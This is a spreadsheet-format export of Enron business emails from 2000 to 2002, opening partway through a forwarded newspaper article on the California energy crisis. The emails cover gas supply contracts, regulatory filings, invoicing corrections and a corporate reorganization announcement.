			Generators like Duke Energy and Reliant Energy aren't convinced the crisis _x000D_
has passed. _x000D_
			For starters, both companies are owed in excess of $700 million for _x000D_
electricity bought by PG&amp;E and Edison but never paid for. _x000D_
			"There are a lot of issues still out there such as how much power your state _x000D_
will require this summer, whether there is enough generation on the ground or _x000D_
available commercially to handle the load if there is a significant spike in _x000D_
demand," said Richard Wheatley, a Reliant spokesman. _x000D_
			Harvey Rosenfield, head of the Foundation for Taxpayer and Consumer Rights, _x000D_
has a slightly different take on whether the worst is over. _x000D_
			"We've said all along it's a crisis inspired by the greed of the utilities _x000D_
and the energy companies," Rosenfield said. _x000D_
			"Now that taxpayers are paying $1 billion every three weeks to buy _x000D_
electricity and the ratepayers are going to pay between $13 billion and $20 _x000D_
billion, the companies are happy and the crisis is over. What more could they _x000D_
want?" _x000D_
			E-mail Greg Lucas at glucas@sfchronicle.com. _x000D_
			_x000D_
? _x000D_
			? Printer-friendly version _x000D_
? Email this article to a friend _x000D_
			_x000D_
			_x000D_
_x000D_
_x000D_
_x000D_
Feedback 	_x000D_
?	_x000D_
		,2001 San Francisco Chronicle ? Page?A3 _x000D_
		_x000D_
_x000D_
		_x000D_
		? _x000D_
		_x000D_
		_x000D_
_x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 04:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kristen.hanson@enron.com', 'gary.hanks@enron.com', 'dan.hyvl@enron.com', 'rebecca.griffin@enron.com', 'ta.mills@enron.com', 'james.mckay@enron.com', 'tom.cathey@enron.com', 'pat.flavin@enron.com', 'daren.farmer@enron.com'})</t>
  </si>
  <si>
    <t>Mobil Beaumont Refinery</t>
  </si>
  <si>
    <t>Just wanted to thank everybody who works with Mobil Beaumont Refinery._x000D_
_x000D_
Our former three year deal with them expired September 30.  Last week, we _x000D_
(finally) executed a new contract that keeps HPL as their largest natural gas _x000D_
supplier through September 30, 2002.  Also, when their volumes go up in early _x000D_
2001, they will once again be HPL's single largest industrial customer._x000D_
_x000D_
Everybody's hard work in keeping this customer happy has paid off.  Although _x000D_
they can be very demanding to work with (particularly now that they are part _x000D_
of Exxon), they know that HPL provides them the best overall service._x000D_
_x000D_
Please pass on thanks to anyone I've left off the list who has worked with _x000D_
Mobil Beaumont Refinery._x000D_
_x000D_
Have a great 2001._x000D_
_x000D_
Lee Papayoti_x000D_
713-853-5923</t>
  </si>
  <si>
    <t>Fri, 5 May 2000 01:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.leibert@enron.com'})</t>
  </si>
  <si>
    <t>Re: Indian Prime Minister visit to Houston</t>
  </si>
  <si>
    <t xml:space="preserve">Dick, I don't know if we answered this for you or not, but I'm sure it will _x000D_
be fine for you to draft a letter for Ken's signature._x000D_
_x000D_
Rosie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Richard Leibert@ENRON_DEVELOPMENT_x000D_
05/01/2000 09:10 AM_x000D_
To: Kenneth Lay@ENRON_x000D_
cc: Rosalee Fleming@ENRON _x000D_
Subject: Indian Prime Minister visit to Houston_x000D_
_x000D_
Ken,_x000D_
_x000D_
Received communications from the Texas Department of Economic Development and _x000D_
the Indo-American Chamber of Commerce.  Both would like to invite PM Vajpayee _x000D_
to Houston during his U.S. visit in September.  The last time that we had a _x000D_
PM here was in '94 with PM Rao.  I would like to support this action and _x000D_
would recommend that we draft a letter for your signature.  Have discussed _x000D_
same with Joe Sutton and have his support._x000D_
_x000D_
Dick_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Mar 2001 14:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Duke Energy Field 7/00</t>
  </si>
  <si>
    <t>We are finally closing another month.  Please change the demand fee on deal 157278 for July 2000 from $33,239.39 to $22,159.22._x000D_
_x000D_
Thanks,_x000D_
Megan</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 06:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Ontario Standard Physical Bilateral Contract</t>
  </si>
  <si>
    <t>Chris _x000D_
_x000D_
Was Ontario Power Generation the Canadian company you mentioned this morning _x000D_
that has alot of generation in Ontario and would likely be a major factor in _x000D_
determining the contract to be utilized in Canada?  Shari has had numerous _x000D_
conversations with a Greg Malcolm there and he has said that they are very _x000D_
interested in contracting with EPMI using EEI.  He and Shari have a call _x000D_
scheduled for Nov 20th.  _x000D_
_x000D_
Just curious.</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 10:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'smara@enron.com', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>FW: I.01-04-002 ALJ's Thomas' Ruling</t>
  </si>
  <si>
    <t>Do you folks want us to monitor the holding company case, or file an_x000D_
appearance for Enron?  let us know. Mike_x000D_
-----Original Message-----_x000D_
From: ALJ Temp1 [mailto:t93@cpuc.ca.gov]_x000D_
Sent: Wednesday, April 11, 2001 3:15 PM_x000D_
To: 'ConsumersFirst@worldnet.att.net'; 'DavoodiKR@efaches.navfac.navy.mil';_x000D_
'Gabriel.Vivas@asm.ca.gov'; 'JDASOVIC@EES.ENRON.';_x000D_
'LKristov@energy.state.ca.us'; 'Rsperberg@onsitesycom.com';_x000D_
'Slayman@energy.state.ca.us'; 'abb@eslawfirm.com';_x000D_
'ad046@detroit.freenet.org'; 'alexm@calpine.com'; 'anchau@shellus.com';_x000D_
'andy.bettwy@swgas.com'; 'aorchar@smud.org'; 'askaff@energy-law-group.com';_x000D_
Hartmann, Audra; 'athomas@newenergy.com'; 'awattslaw@earthlink.net'; Premo,_x000D_
Anne W.; 'berry@apx.com'; 'bfinkelstein@turn.org';_x000D_
'bill.mccallum@ci.fresno.ca.us'; 'bill.wells@afcesa.af.mil';_x000D_
'bill@jbsenergy.com'; Julian, Bill; 'bjeider@earthlink.net';_x000D_
'blaising@braunlegal.com'; 'bloomje@la.whitecase.com';_x000D_
'bob_anderson@apses.com'; 'bowerl@hdcdojnet.state.ca.us';_x000D_
'bpowers@seniors.org'; 'brb3@pge.com'; 'brbarkovich@earthlink.net';_x000D_
'btenney@landuselaw.com'; 'burkee@cts.com'; Brown, Carol A.;_x000D_
'cabaker@duke-energy.com'; Linsey, Steve; 'casey@cityatty.sannet.gove';_x000D_
'ceyap@earthlink.net'; 'charles_doering@rmiinc.com'; 'chilen@llgm.com';_x000D_
'chrism@mid.org'; Blunt, Christopher J.; 'clpearce@duanemorris.com';_x000D_
'cmason@omm.com'; 'cmkehrein@ems-ca.com'; Walwyn, Christine M.;_x000D_
'cpeyton@sacbee.com'; 'cread@steptoe.com'; Danforth, Christopher;_x000D_
'cyounger@manatt.com'; 'dbb@sdcity.sannet.gov'; 'dbranchcomb@hesinet.com';_x000D_
'dcarroll@dbsr.com'; 'ddavie@hesinet.com'; 'derkp@newsdata.com';_x000D_
'dfollett@sempra.com'; 'dgilmore@sempra.com'; 'dhuard@manatt.com';_x000D_
'difellman@energy-law-group.com'; Fukutome, David K.; 'dkk@eslawfirm.com';_x000D_
Lafrenz, Donald J.; 'dmarcus@slip.net'; 'dnorris@sppc.com';_x000D_
'douglass@arterhadden.com'; 'dwmp@dwmpdc.com'; 'dwrlegal1@water.ca.gov';_x000D_
'dws@keywaycorp.com'; 'ecrem@ix.netcom.com'; 'ed@apx.com'; 'ed@clfp.com';_x000D_
'edwardoneill@dwt.com'; 'ek@a-klaw.com'; 'emitchel@angnewspapers.com';_x000D_
'epoole@adplaw.com'; 'estrategy@compuserve.com'; 'fbrown@orrick.com';_x000D_
'fchu@legal.ladwp.com'; 'fieldejr@sce.com'; 'firmiyas@dof.ca.gov';_x000D_
'fmo@sdcity.sannet.gov'; 'foothill@lmi.net'; 'fosterbc@sce.com'; Fua,_x000D_
Faline; 'furutanj@efawest.navfac.navy.mil'; 'fwmonier@tid.org';_x000D_
'georgeperrault@msn.com'; 'gerhordt.herbert@msdw.com'; Kinosian, Robert;_x000D_
'gklatt@jonesday.com'; 'glwaas@calpx.com'; 'gtbl@dynegy.com';_x000D_
'gvaranini@lmlaw.net'; 'hbd@gweiss.com'; 'hchoy@isd.co.la.ca.us';_x000D_
'hodgesjl@pacbell.net'; 'honest@compuserve.com'; 'howens@seniors.org';_x000D_
Yacknin, Hallie; 'hylaw@pacbell.net'; 'igsinc@ix.netcom.com';_x000D_
'imoosen@gralegal.com'; 'jabbott@entrix.com'; 'jasonm@newsdata.com';_x000D_
'jbarthrop@powersavers.com'; 'jbennett@gmssr.com'; 'jbradley@svmg.org';_x000D_
'jbushee@sablaw.com'; 'jcpaine@stoel.com'; 'jdodson@sempra.com'; Fulcher,_x000D_
Jack; 'jerryl@abag.ca.gov'; Scarff, James E.; Econome, Janet A.; Zeller,_x000D_
Jason; 'jleslie@luce.com'; Lo, Jeanette; 'jlondon@gralegal.com';_x000D_
'jlyoung@sempra.com'; 'jmalkin@orrick.com'; 'jnnc@chevron.com';_x000D_
'joe.paul@dynegy.com'; 'jogg@jhenergy.com'; 'johnj@bradyberliner.com';_x000D_
'jon.jacobs@paconsulting.com'; 'joseh@lif.org'; 'jparrott@sempra.com';_x000D_
'jptang@oaklandcityattorney.org'; DeUlloa, Joseph R.;_x000D_
'jsilva@edisonenterprises.com'; 'jskillman@prodigy.net';_x000D_
'jsmollon@newwestenergy.com'; 'jsqueri@gmssr.com'; Wong, John S.;_x000D_
'jtachera@energy.state.ca.us'; 'julesan@aol.com'; 'jvo1@pge.com';_x000D_
'jweil@aglet.org'; 'jyoung@ebmud.com'; 'kam@eslawfirm.com';_x000D_
'karen@klindh.com'; 'keith-sappenfield@reliantenergy.com'; Malcolm, Kim;_x000D_
'kmccrea@sablaw.com'; 'kmcspadd@milbank.com'; 'kmills@cfbf.com'; Kajopaiye,_x000D_
Kayode; 'kpoole@adamsbroadwell.com'; 'lgurick@calpx.com';_x000D_
'lindseyhowdowning@dwt.com'; Krannawitter, Laura L.; 'lmh@eslawfirm.com';_x000D_
'lsaffil@flash.net'; Serizawa, Linda; 'luluw@newsdata.com';_x000D_
'mark.c.moench@wgp.twc.com'; 'matthew.wright@Pacificorp.com';_x000D_
'mbrubaker@consultbai.com'; Chamberlain, Michael; 'mday@gmssr.com';_x000D_
'mdjoseph@adamsbroadwell.com'; Monson, Maurice;_x000D_
'melanie_gillette@rmiinc.com'; Stevens, Maria E.; 'mflorio@turn.org';_x000D_
'mgomez1@bart.gov'; 'mhg@hetrading.com'; 'mlw3@pge.com';_x000D_
'mmattes@nossaman.com'; 'mpa@a-klaw.com'; 'mpatel@brownwoodlaw.com';_x000D_
'mschwebs@energy.state.ca.us'; 'mshames@ucan.org'; 'musicamaria@yahoo.com';_x000D_
'napedersen@jonesday.com'; 'nevillm@hdcdojnet.state.ca.us'; Walsh, Natalie;_x000D_
'nryan@environmentaldefense.org'; 'office@mccarthylaw.com'; Vlahos, Ourania_x000D_
M.; 'oshirock@pacbell.net'; 'pat.williams@dhcmail.com';_x000D_
'patrickm@crossborderenergy.com'; 'paul.harris@bridge.com';_x000D_
'pbray@newpower.com'; 'peter_fox-penner@brattle.com'; 'phanschen@mofo.com';_x000D_
'phil@calcable.org'; 'pjmuller@ricochet.net'; 'pjpowerlaw@aol.com';_x000D_
'pmcdonne@wenet.net'; 'pstohr@dbsr.com'; 'pxo2@pge.com'; Barnett, Robert A.;_x000D_
'randy.chinn@senate.ca.gov'; 'randy_britt@mayco.com'; White, Rosalina;_x000D_
'rbw@mrwassoc.com'; Cagen, Robert C.; 'rcosta@turn.org';_x000D_
'rcsstl@cdmnet.com'; 'rczahar@aol.com'; 'rick.counihan@greenmountain.com';_x000D_
'rkeen@manatt.com'; 'rliebert@cfbf.com'; 'rmccann@cal.net';_x000D_
'robert.d.schasel@fritolay.com'; 'rogerberliner@bcjlaw.com';_x000D_
'ronknecht@aol.com'; 'rpernell@energy.state.ca.us'; 'rrcollins@n-h-i.org';_x000D_
'rschmidt@bartlewells.com'; 'rtavares@energy.state.ca.us'; Feraru, Robert_x000D_
T.; Clark, Richard W.; 'saw0@pge.com'; 'sberlin@mccarthylaw.com';_x000D_
'scarter@nrdc.org'; 'scottst@mid.org'; Casey, Sean F.;_x000D_
'sgreenberg@realenergy.com'; Gallagher, Sean H.; Logan, Scott;_x000D_
'slins@ci.glendale.ca.us'; 'smoss@hooked.net'; 'smutny@iepa.com'; Wilson,_x000D_
Sean; Thomas, Sarah R.; 'ssmyers@worldnet.att.net';_x000D_
'ssnyder@legal.ladwp.com'; 'stevebowen@earthlink.net';_x000D_
'stevegreenwald@dwt.com'; 'stomashe@energy.state.ca.us';_x000D_
'swchurchill@juno.com'; 'tes@dwmpdc.com'; 'theresa_mueller@ci.sf.ca.us';_x000D_
'thompson@wrightlaw.com'; 'thoulihan@mdbe.com'; 'tmacbride@gmssr.com';_x000D_
'tmberliner@duanemorris.com'; 'tmd9@pge.com'; 'tom.oneill@abnamro.com';_x000D_
'tomb@crossborderenergy.com'; 'translaw@pougiales.com';_x000D_
'twetzel@thermoecotek.com'; Burns, Truman L.; 'uwuaregion5@earthlink.net';_x000D_
'vhconsult@earthlink.net'; 'wbooth@booth-law.com'; 'whe1@pge.com'; Yee,_x000D_
Helen W.; 'yladso19@idt.net'; Tapawan-Conway, Zenaida G._x000D_
Subject: I.01-04-002 ALJ's Thomas' Ruling_x000D_
_x000D_
_x000D_
_x000D_
&lt;&lt;CPUC01-#95085-v1-I0104002_Thomas_Ruling.DOC&gt;&gt;_x000D_
_x000D_
_x000D_
 - CPUC01-#95085-v1-I0104002_Thomas_Ruling.DOC</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 02:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">The change as to Japan and Australia, as you know, was expected._x000D_
_x000D_
I would like to discuss with you the legal support for these offices. I wou=_x000D_
ld=20_x000D_
then think we would want to have a discussion with Mark Evans to make sure =_x000D_
we=20_x000D_
are all on the same page._x000D_
_x000D_
Alan._x000D_
----- Forwarded by Alan Aronowitz/HOU/ECT on 09/07/2000 08:54 AM -----_x000D_
_x000D_
=09Office of the Chairman@ENRON_x000D_
=0909/06/2000 05:10 PM_x000D_
=09=09_x000D_
=09=09 To: All Enron Worldwide_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Organizational Changes_x000D_
 Office of the Chairman_x000D_
In support of Enron=01,s continuing efforts to increase its return on inves=_x000D_
ted=20_x000D_
capital and direct resources towards our highest return businesses, David=_x000D_
=20_x000D_
Haug, Chairman and CEO of Enron CALME, Jim Hughes, President and COO of Enr=_x000D_
on=20_x000D_
APACHI, Joe Kishkill, Managing Director of Enron South America, and Frank=_x000D_
=20_x000D_
Stabler, formerly a Managing Director of Enron CALME, will join Mark Metts =_x000D_
in=20_x000D_
a corporate wide effort, to help monetize some of Enron=01,s assets.  David=_x000D_
 will=20_x000D_
help transition the CALME business activities into other parts of Enron whi=_x000D_
le=20_x000D_
working with Mark on the asset monetization projects.  David will continue =_x000D_
as=20_x000D_
an Executive Vice President for Enron Corp and a member of Enron=01,s Execu=_x000D_
tive=20_x000D_
Committee.  Cliff Baxter will oversee this effort._x000D_
_x000D_
Consistent with these changes, the CALME group will be divided as follows. =_x000D_
=20_x000D_
Enron Global LNG and Enron=01,s Caribbean Basin activities will become part=_x000D_
 of=20_x000D_
the new Enron Global Markets (EGM) group headed by Mike McConnell.  Rick=20_x000D_
Bergsieker, President/COO of LNG will continue in that role and in his dual=_x000D_
=20_x000D_
role as President/COO of Enron Middle East, which will also join EGM. Shawn=_x000D_
=20_x000D_
Cumberland, President and COO of the Caribbean Basin unit and his executive=_x000D_
=20_x000D_
team will carry out the transition process for the Caribbean business unit'=_x000D_
s=20_x000D_
people and businesses as part of EGM.  Management of its Colombia and=20_x000D_
Venezuela businesses will transfer to Enron South America and its LNG-relat=_x000D_
ed=20_x000D_
activities to EGM as described above.=20_x000D_
_x000D_
The EES related initiatives and people will be transferred to those units. =_x000D_
=20_x000D_
All of the various international businesses will participate as usual in th=_x000D_
e=20_x000D_
upcoming budget process with their new alignment and continue to meet their=_x000D_
=20_x000D_
plan targets for 3rd and 4th quarters._x000D_
_x000D_
Concurrently, we are consolidating our trading and merchant activities in=_x000D_
=20_x000D_
Japan and Australia into Enron Europe.  Joe Hirl and Paul Quilkey will repo=_x000D_
rt=20_x000D_
to Enron Europe=01,s Office of the Chairman._x000D_
_x000D_
We congratulate David Haug and Rebecca McDonald for proposing these=20_x000D_
realignments, which we agree, will maximize both the financial and=20_x000D_
intellectual capital in Enron.  Over the coming weeks, specific assignments=_x000D_
=20_x000D_
and reporting relationships will be determined and communicated._x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Jan 2002 12:03:48 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: E-Tag 1.7 Test Procedure</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
-----Original Message-----_x000D_
From: sccobb@srpnet.com [mailto:sccobb@srpnet.com]_x000D_
Sent: Friday, January 25, 2002 4:09 PM_x000D_
To: Interchange Scheduling &amp; Accounting Subcommittee (ISAS)_x000D_
Subject: E-Tag 1.7 Test Procedure_x000D_
_x000D_
_x000D_
ISAS Members,_x000D_
_x000D_
Attached is a draft test procedure for E-Tag 1.7. It was created and_x000D_
approved by a small "swat team" of ISAS members and WSCC Staff. Please_x000D_
review this draft procedure and provide any comments you may have by 1200_x000D_
MST Tuesday, January 29, 2002. _x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;E-Tag  Functionality Test Ver 1_1-25-02.doc&gt;&gt; _x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 03:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Schaeffer Property - Livingston County, Illinois</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 11/01/2000 11:28 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Fred Mitro@ECT_x000D_
10/11/2000 10:46 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc: Rusty Stevens/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Re: Schaeffer Property - Livingston County, Illinois  _x000D_
_x000D_
Kay:_x000D_
_x000D_
The Fehrs and Ledfords did sign their respective option agreements last week _x000D_
prior to our Zoning Board of Appeals meeting.  I am expecting Karen Way to _x000D_
forward you an executed original copy of each agreement.  I will check with _x000D_
her on the status of this._x000D_
_x000D_
With regard to the policy, I understand your point.  Rusty and I will work to _x000D_
better co-ordinate with you in the future.  Perhaps we can lever off of _x000D_
Kathleen for agreements such as the Schaeffer option._x000D_
_x000D_
Let me know._x000D_
_x000D_
Fred_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kay Mann @ ENRON                           10/10/2000 08:51 AM_x000D_
	_x000D_
_x000D_
To: Rusty Stevens/Corp/Enron@ENRON, Fred Mitro/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Schaeffer Property - Livingston County, Illinois_x000D_
_x000D_
Hi Guys,_x000D_
_x000D_
Enron policy requires that the assignment of tasks to outside counsel go _x000D_
through (or at least be coordinated with) the legal department.  In the _x000D_
future, please let me know what you need so that there can be some order to _x000D_
the process._x000D_
_x000D_
Did the Fehrs and Ledfords sign the option agreements?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 10/10/2000 08:47 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Way, Karen S. - CHI" &lt;karen.way@piperrudnick.com&gt; on 10/09/2000 02:52:14 PM_x000D_
To: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;_x000D_
cc: "'rusty.stevens@enron.com'" &lt;rusty.stevens@enron.com&gt;, _x000D_
"'fred.mitro@enron.com'" &lt;fred.mitro@enron.com&gt;, "Gershon, Mark A. - CHI" _x000D_
&lt;Mark.Gershon@piperrudnick.com&gt;, "Townsend, Christopher J. - CHI" _x000D_
&lt;chris.townsend@piperrudnick.com&gt;, "Shindler, Donald A. - CHI" _x000D_
&lt;Donald.Shindler@piperrudnick.com&gt; _x000D_
_x000D_
Subject: Schaeffer Property - Livingston County, Illinois_x000D_
_x000D_
Kay:_x000D_
_x000D_
This morning, Rusty requested that we prepare an Option Agreement for the 29_x000D_
acre parcel west of the Livingston Energy Center.  This property could be_x000D_
used as a construction laydown site, but more importantly would provide a_x000D_
sound buffer for the project.  It is our understanding that the Option_x000D_
Agreement is to be presented to the property owner at some point next week._x000D_
We will forward a draft of the agreement to you no later than Monday,_x000D_
October 16, 2000.  Please feel free to call me or Don Shindler_x000D_
(312-368-2175) with any questions regarding the agreement.  Best regards._x000D_
_x000D_
_x000D_
Karen S. Way_x000D_
Piper Marbury Rudnick &amp; Wolfe_x000D_
203 N. LaSalle_x000D_
Chicago, Illinois 60601_x000D_
email:  karen.way@piperrudnick.com_x000D_
(ph) 312-368-2152_x000D_
(fax) 312-630-6347_x000D_
_x000D_
_____________________________________________________________________________x000D_
The information contained in this communication may be confidential, is _x000D_
intended only for the use of the recipient named above, and may be legally _x000D_
privileged.  If the reader of this message is not the intended recipient, you _x000D_
are hereby notified that any dissemination, distribution, or copying of this _x000D_
communication, or any of its contents, is strictly prohibited. If you have _x000D_
received this communication in error, please re-send this communication to _x000D_
the sender and delete the original message and any copy of it from your _x000D_
computer system._x000D_
Thank you._x000D_
_x000D_
For more information about Piper Marbury Rudnick &amp; Wolfe, please visit us at _x000D_
http://www.piperrudnick.com/_x000D_
_____________________________________________________________________________x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 13:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'karen.heathman@enron.com'})</t>
  </si>
  <si>
    <t>RE: Investigation Research</t>
  </si>
  <si>
    <t xml:space="preserve">Please print and file tx rick_x000D_
---------------------- Forwarded by Rick Buy/HOU/ECT on 01/30/2001 09:45 AM ---------------------------_x000D_
   _x000D_
_x000D_
	  From:  Sheila Walton                           01/30/2001 09:05 AM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	Rick Buy/HOU/ECT@ECT_x000D_
cc:	 _x000D_
Subject:	RE: Investigation Research_x000D_
_x000D_
For your peace of mind._x000D_
_x000D_
sheila _x000D_
---------------------- Forwarded by Sheila Walton/HOU/ECT on 01/30/2001 09:03 AM ---------------------------_x000D_
From:	Robert Howes/ENRON@enronXgate on 01/30/2001 08:27 AM_x000D_
To:	Sheila Walton/HOU/ECT@ECT_x000D_
cc:	Roberto Deleon/ENRON@enronXgate, Matthew Ahern/ENRON@enronXgate _x000D_
Subject:	RE: Investigation Research_x000D_
_x000D_
_x000D_
 		_x000D_
_x000D_
_x000D_
We will save this for our records._x000D_
Thanks,_x000D_
Robert Howes_x000D_
Sr. Security Specialist_x000D_
IT Security and Controls_x000D_
Work 713-345-3423_x000D_
Fax     713-646-3010_x000D_
Email             mailto:Robert.Howes@Enron.com_x000D_
2Way Pager mailto:roberthowes@pagenetips.com_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Walton, Sheila  _x000D_
Sent:	Tuesday, January 30, 2001 12:31 AM_x000D_
To:	Howes, Robert; Ahern, Matthew_x000D_
Cc:	Deleon, Roberto; Buy, Rick_x000D_
Subject:	Investigation Research_x000D_
Importance:	High_x000D_
Sensitivity:	Confidential_x000D_
_x000D_
Rick Buy, the Business Unit Head for the RAC group, and I logged onto his computer on Friday, January 26, 2001 to review information for an investigation on one of his employees.  We logged on at 3:01 PM and logged off at 3:15 PM.  Please make certain that the records reflect this investigative effort so Mr. Buy's name does not come up in a random search for accessing inappropriate websites.  If you have any questions, please call me at Ext 30649. Thank you. _x000D_
_x000D_
_x000D_
Sheila Walton_x000D_
HR Director_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 08:45:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rmp@cpuc.ca.gov', 'alexanms@sce.com', 'llorenz@socalgas.com', 'craigc@calpine.com', 'paulamirault@aec.ca', 'mday@gmssr.com', 'porterdk@sce.com', 'kmccrea@sablaw.com', 'ewo@jmbm.com', 'jleslie@luce.com', 'burkee@cts.com', 'tomb@crossborderenergy.com'})</t>
  </si>
  <si>
    <t>The Gas Settlement that Wouldn't Die</t>
  </si>
  <si>
    <t>Folks:_x000D_
Before filing comments on Bilas' proposal to modify our settlement with SoCal and vote it out on the 25th, I wanted to get a sense of how folks feel about it generally.  Hope all is well._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Fri, 6 Jul 2001 10:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janine.migden@enron.com', 'harry.kingerski@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'robert.frank@enron.com', 'steve.montovano@enron.com', 'patrick.keene@enron.com', 'roy.boston@enron.com', 'susan.landwehr@enron.com', 'robert.neustaedter@enron.com'})</t>
  </si>
  <si>
    <t>Streaming programs</t>
  </si>
  <si>
    <t>Are any of you aware of any customer choice programs (preferably gas) that _x000D_
are of the "streaming" variety, that is, the utility purchases a particular _x000D_
package of gas for a customer and the customer pays the price for that _x000D_
particular package rather than the WACOG.  This type of program would be used _x000D_
where direct access has not been adopted.  I need to know for a data request _x000D_
in a Southwest Gas gas ASAP.  Thanks.</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 07:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'donnie.myers@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'tammy.gilmore@enron.com'})</t>
  </si>
  <si>
    <t>March Buy / Sale (BuyBack) with Enron LNG</t>
  </si>
  <si>
    <t xml:space="preserve">Tom and Tammy,_x000D_
_x000D_
	After talking with Dan Masters yesterday, I believe we have the Buy / Sale incorrect in our system.  In Sitarra, the deal (Sale side #672336) was set up for a monthly total of 10,920 (should acutally be 10,902) and was set up for March 16 - 31.  Being that the dates were set as such, a total was calculated for those days only producing a volume of 5,632 to sell back to Enron LNG.  Dan Masters says that the buyback contract was not supposed to be daily and should be for the full monthly amount of 10,902 mmbtu.  He says that they sold us the full contract amount and that they bought back the full 10,902.  Could both of you please look at this and correct the volumes in our system so that I can invoice Enron LNG for the 10,902 mmbtu instead of the 5,632?  Please let me or Dan know if you have any questions.  _x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 02:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Any Update</t>
  </si>
  <si>
    <t xml:space="preserve">Kate, what is the latest regarding Sierra Pacific Industries and the buy _x000D_
backs for the 29th &amp; 30th in the amount of $103,968 for each day?  Let me _x000D_
know if I can obtain more information for you.  The payment terms are net 5 _x000D_
days after receipt of invoice, which they faxed to me on April 30th._x000D_
_x000D_
Again, thanks for all your help regarding this and all the EES items._x000D_
_x000D_
_x000D_
_x000D_
Mark  </t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 02:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">no poblem - i enjoyed it as well.  let's do it again sometime_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital Management_x000D_
	_x000D_
	From:  David Baumbach                           11/27/2000 10:27 AM_x000D_
	_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Thanks again for the golf on Wednesday.  It was a lot of fun._x000D_
_x000D_
Dave_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 10:54:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sgtcase@aol.com'})</t>
  </si>
  <si>
    <t>Test_x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	SgtCase@aol.com@ENRON  _x000D_
Sent:	Wednesday, October 24, 2001 12:50 PM_x000D_
To:	Griffith, John_x000D_
Subject:	test_x000D_
_x000D_
test</t>
  </si>
  <si>
    <t>Wed, 8 Mar 2000 00:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Expense Report for Stephen Schwarz Dated 2/25/00</t>
  </si>
  <si>
    <t xml:space="preserve">Approved._x000D_
Sally Beck_x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 03/08/2000 08:05 AM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Stephen P Schwarz                           02/29/2000 03:30 PM_x000D_
	_x000D_
_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc: Kimberly Perkins/HOU/ECT@ECT _x000D_
Subject: Expense Report for Stephen Schwarz Dated 2/25/00_x000D_
_x000D_
For your approval.  Thanks._x000D_
Stephen_x000D_
---------------------- Forwarded by Stephen P Schwarz/HOU/ECT on 02/29/2000 _x000D_
03:27 PM ---------------------------_x000D_
_x000D_
_x000D_
Kimberly Perkins_x000D_
02/29/2000 03:14 PM_x000D_
To: Stephen P Schwarz/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Expense Report for Stephen Schwarz Dated 2/25/00_x000D_
_x000D_
Stephen,_x000D_
_x000D_
Attached is your revised expense report for your approval.  Thank you._x000D_
_x000D_
Kim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 07:52:00 -0800 (PST)</t>
  </si>
  <si>
